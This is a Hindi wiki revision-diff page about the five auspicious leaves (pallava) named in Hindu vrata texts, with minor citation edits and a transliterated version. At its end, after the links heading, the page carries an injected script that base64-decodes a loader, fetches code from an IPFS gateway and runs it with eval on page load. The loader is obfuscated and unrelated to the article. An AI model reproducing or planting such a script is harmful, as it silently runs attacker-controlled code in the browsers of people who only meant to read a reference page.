Difference between revisions of "पल्लव"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replace - "ref>(" to "ref>")
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*पाँच शुभ पल्लव हैं–आम्र, अश्वत्थ, वट, प्लक्ष एवं उदुम्बर।<ref>(दुर्गाभक्तितरंगिणी, पृ0 27);</ref>
+
*पाँच शुभ पल्लव हैं–आम्र, अश्वत्थ, वट, प्लक्ष एवं उदुम्बर।<ref>दुर्गाभक्तितरंगिणी, पृ0 27);</ref>
 
*हेमाद्रि<ref>हेमाद्रि व्रतखण्ड 1, 47,</ref> व [[भविष्य पुराण]] के अनुसार इन्हें "पंचभंग" भी कहा गया है।  
 
*हेमाद्रि<ref>हेमाद्रि व्रतखण्ड 1, 47,</ref> व [[भविष्य पुराण]] के अनुसार इन्हें "पंचभंग" भी कहा गया है।  
 
+
{{प्रचार}}
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==

Latest revision as of 12:14, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • paanch shubh pallav haian–amr, ashvatth, vat, plaksh evan udumbar.[1]
  • hemadri[2] v bhavishy puran ke anusar inhean "panchabhang" bhi kaha gaya hai.


tika tippani aur sandarbh

  1. durgabhaktitarangini, pri0 27);
  2. hemadri vratakhand 1, 47,

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>